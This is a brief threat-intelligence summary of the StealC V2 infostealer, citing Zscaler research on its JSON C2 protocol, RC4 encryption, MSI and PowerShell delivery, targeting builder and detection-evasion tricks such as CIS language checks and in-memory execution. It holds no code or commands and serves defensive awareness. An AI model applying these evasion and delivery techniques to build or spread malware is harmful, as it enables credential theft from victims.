StealC V2, the latest version of the StealC infostealer and downloader active since January 2023, was released in March 2025 with major upgrades that boost its stealth, flexibility, and delivery capabilities. Researchers from Zscaler note enhancements including a streamlined JSON-based C2 protocol, RC4 encryption, and advanced payload delivery using MSI packages and PowerShell scripts, expanding its infection vectors beyond traditional EXE and DLL formats. The malware also includes a redesigned control panel and customizable builder that enables geolocation- and software-based targeting, multi-monitor screenshot capture, and server-side credential bruteforcing.
To avoid detection, StealC V2 performs language checks to bypass systems in CIS countries, and executes PowerShell payloads in memory, evading disk-based defenses. The use of legitimate Windows tools like msiexec.exe and powershell.exe enhances stealth and persistence. With these upgrades, StealC V2 demonstrates the increasing sophistication of commodity malware and its ability to evade traditional detection methods.